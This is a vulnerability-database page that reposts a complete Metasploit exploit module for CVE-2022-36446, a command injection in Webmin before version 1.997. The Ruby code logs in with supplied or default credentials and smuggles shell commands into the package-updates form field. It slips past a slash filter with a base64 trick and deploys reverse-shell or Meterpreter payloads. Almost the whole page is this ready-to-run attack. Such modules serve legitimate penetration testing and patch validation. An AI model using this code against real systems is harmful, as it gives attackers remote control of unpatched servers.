Advertisement






Webmin Package Updates Command Injection

CVE Category Price Severity
CVE-2022-36446 CWE-78 $5,000 Critical
Author Risk Exploitation Type Date
Brendan Coles High Remote 2022-08-14
CPE
cpe:cpe:/a:webmin:webmin
CVSS EPSS EPSSP
CVSS:7.2/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080048

Below is a copy:

Webmin Package Updates Command Injection
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin Package Updates RCE',
        'Description' => %q{
          This module exploits an arbitrary command injection in Webmin
          versions prior to 1.997.

          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform
          package updates and installation. Due to a lack of input
          sanitization, it is possibe to inject arbitrary command that will be
          concatenated to the package manager call.

          This exploit requires authentication and the account must have access
          to the Software Package Updates module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Christophe De La Fuente', # MSF module
          'Emir Polat' # Discovery and PoC
        ],
        'References' => [
          [ 'EDB', '50998' ],
          [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],
          [ 'CVE', '2022-36446']
        ],
        'DisclosureDate' => '2022-07-26',
        'Platform' => ['unix', 'linux'],
        'Privileged' => true,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],
        'Payload' => { 'BadChars' => '/' },
        'DefaultOptions' => {
          'RPORT' => 10000,
          'SSL' => true
        },
        'Targets' => [
          [
            'Unix In-Memory',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
            }
          ],
          [
            'Linux Dropper (x86 & x64)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux Dropper (ARM64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_AARCH64,
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res

    if res.body.include?('This web server is running in SSL mode.')
      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
    end

    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first

    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version

    version = Rex::Version.new(version)

    vprint_status("Webmin #{version} detected")

    unless version < Rex::Version.new('1.997')
      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")
    end

    vprint_good("Webmin #{version} is a supported target")

    CheckCode::Appears
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown("#{peer} - Could not connect to web service")
  end

  def do_login
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),
      'headers' => { 'Referer' => full_uri },
      'cookie' => 'testing=1',
      'keep_cookies' => true,
      'vars_post' => {
        'user' => datastore['USERNAME'],
        'pass' => datastore['PASSWORD']
      }
    })

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302

    print_good('Logged in!')
  end

  def execute_command(cmd, _opts = {})
    cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')
    cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),
      'headers' => { 'Referer' => full_uri },
      'vars_post' => {
        'mode' => 'new',
        'search' => rand_text(10),
        'redir' => '',
        'redirdesc' => '',
        'u' => cmd,
        'confirm' => 'Install Now'
      }
    })
  end

  def exploit
    print_status('Attempting login')
    do_login

    print_status('Sending payload')
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum